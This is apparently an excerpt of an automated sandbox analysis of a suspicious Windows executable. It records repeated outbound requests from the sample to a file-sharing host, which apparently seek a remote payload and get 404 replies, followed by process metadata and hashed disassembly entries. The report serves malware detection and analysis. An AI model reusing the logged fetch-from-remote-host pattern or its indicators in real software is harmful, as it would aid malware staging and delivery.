                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            71192.168.2.950050194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:35 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:36 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:36 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:36 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            72192.168.2.950051194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:37 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:38 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:37 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:38 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            73192.168.2.950052194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:39 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:40 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:39 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:40 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            74192.168.2.950053194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:41 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:42 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:41 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:42 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            75192.168.2.950054194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:43 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:43 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:43 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:43 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            76192.168.2.950055194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:45 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:45 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:45 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:45 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:12:56:38
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\MWP0FO5rAF.exe"
                                                            Imagebase:0x370000
                                                            File size:1'072'096 bytes
                                                            MD5 hash:79E059E518B08ADBF428180B3E05495E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00BD1658 Relevance: .3, Instructions: 277COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1497fce344ff9e4ec0224f2e3b9b9647bf4a6cc3cedca7dcc93d86981bd1c107
                                                              • Instruction ID: dce573427506fe9bda9623e56f703dc4d141c4180f4c3739d994ccb4363b65fa
                                                              • Opcode Fuzzy Hash: 1497fce344ff9e4ec0224f2e3b9b9647bf4a6cc3cedca7dcc93d86981bd1c107
                                                              • Instruction Fuzzy Hash: 36C15E38A042089FDB00DB58D494BA9F7F2FF88304F2885A6D405AB769E7759C42CBA1
                                                              Function 00BD1648 Relevance: .2, Instructions: 244COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07257dc455e921d58620c02f500cc60fed8ed3a398c1f207fc483ebc81558918
                                                              • Instruction ID: ebf41884fd508e37b80181703a44555cc339c5e87f56b2771b83990dee4387cd
                                                              • Opcode Fuzzy Hash: 07257dc455e921d58620c02f500cc60fed8ed3a398c1f207fc483ebc81558918
                                                              • Instruction Fuzzy Hash: D8A15B34A04104DFDB04DB68D494BA9F7F2FB88300F2899E6D405AB769E775EC81DBA4
                                                              Function 00BD1924 Relevance: .2, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0943dd601479f36bfa474053a94a466ef829c5a2162bcf193436f6830edc646
                                                              • Instruction ID: aeb77e33cc632d563b486730a716b1f472e1c712d1482b7b1012605a50383a0e
                                                              • Opcode Fuzzy Hash: a0943dd601479f36bfa474053a94a466ef829c5a2162bcf193436f6830edc646
                                                              • Instruction Fuzzy Hash: C3A13A34A00108DFDB04DB58D594BA9F7F2FB88300F2899E6D405AB769E775EC81DBA4
                                                              Function 00BD0860 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faa9dbc6a870b1aaaa4d65e20389983e72b018370c1262e20268dfeb8141d496
                                                              • Instruction ID: f5b77fe86676c6398864bb043e94e2a34ee6a8b05498e97c6d0fb925244b29fd
                                                              • Opcode Fuzzy Hash: faa9dbc6a870b1aaaa4d65e20389983e72b018370c1262e20268dfeb8141d496
                                                              • Instruction Fuzzy Hash: 65E0124464F3C16FC7134370AC66109BF304A8320570946DFD4C9CB4E3C848452AC7A3
                                                              Function 00BD1365 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a3efff5cc4397061799fcfb4ab43389a58469c16bda181bfd28b295da678c2b
                                                              • Instruction ID: dfbe6fc269cb70a4e5e62603b70f13dd650b0135632221f81da69f59c9525d45
                                                              • Opcode Fuzzy Hash: 1a3efff5cc4397061799fcfb4ab43389a58469c16bda181bfd28b295da678c2b
                                                              • Instruction Fuzzy Hash: 1ED0A739921511CFE704DF158804298F3F0FB45300F4584F6C54563110F7315C458A90
                                                              Function 00BD0890 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3222076354.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_bd0000_MWP0FO5rAF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a564ac5ab460b8b7d02c0612105554e89e20ce25fccf6473032aad5ff29fb4b
                                                              • Instruction ID: 493e29df999749d533c63ce6d74c065d1f0a393da8579e79ce318632740ba957
                                                              • Opcode Fuzzy Hash: 5a564ac5ab460b8b7d02c0612105554e89e20ce25fccf6473032aad5ff29fb4b
                                                              • Instruction Fuzzy Hash: 78902238080A0CCF080023E03808000330CC0800083800020B00C000030A8220000080